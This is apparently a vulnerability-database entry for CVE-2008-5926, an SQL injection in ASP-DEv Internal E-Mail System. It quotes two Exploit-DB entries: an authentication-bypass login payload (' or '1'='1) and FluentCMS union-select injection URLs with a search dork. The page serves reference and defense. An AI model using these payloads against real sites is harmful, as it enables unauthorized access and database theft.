CVE-2008-5926
Published: 2009-01-21
Priority: P342 | high | CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.6th percentile)
Multiple SQL injection vulnerabilities in login.asp in ASP-DEv Internal E-Mail System allow remote attackers to execute arbitrary SQL commands via the (1) login parameter (aka user field) or the (2) password parameter (aka pass field). NOTE: some of these details are obtained from third party information.
No detection rules found.
Exploit-DB
ASP-DEV Internal E-Mail System - Authentication Bypass
exploitdb·2008-12-14
CVE-2008-5926 ASP-DEV Internal E-Mail System - Authentication Bypass
---
#########################################################
Portal Name: Internal E-Mail System
Vendor : http://asp-dev.com/main.asp?page=41
Download : http://asp-dev.com/download.asp?did=4
Author : Pouya_Server , [email protected]
Vulnerability : (Auth Bypass) SQL Injection Vulnerability
#########################################################
[Auth Bypass]:
user: ' or '1'='1
pass: ' or '1'='1
Victim :
http://asp-dev.com/message
# milw0rm.com [2008-12-14]
Exploit-DB
FluentCMS - 'view.php' SQL Injection
exploitdb·2008-04-27
CVE-2008-6642 FluentCMS - 'view.php' SQL Injection
---
###################################################
[~] FluentCMS Remote Sql İnj. Vuln.
[~] Founder: cO2 [ Algeria Security Crew ]
[~] HomePage: http://www.DZ-Secure.com
[~] Greatz : To all Hackerz from Algeria & All My Friends . . .
[~] Contact: [email protected]
[~] Greetz2 : Str0ke,Inphex,DigitalMind,His0k4,Stack-Terrorist,mArEzZinA,Waraxe,Str0xo
[~] Special thanks to : Inphex
[~] Dork : Powered by FluentCMS
[~] Exploit :
http://www.xxx.org/view.php?sid=-5926+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,unhex(hex(version())),17,unhex(hex(user())),unhex(hex(database())),20,21,22,23,24,25,26,27,28,29,30,31,32--
or
http://www.xxx.org/view.php?sid=-3+union+select+1,2,3,unhex(hex(user())),5,6,7,unhex(hex(database())),9,10,11,12,13,14,unhex(hex(v
No writeups or analysis indexed.
http://secunia.com/advisories/33103
http://securityreason.com/securityalert/4925
http://www.securityfocus.com/bid/32808
https://www.exploit-db.com/exploits/7447
Published: 2009-01-21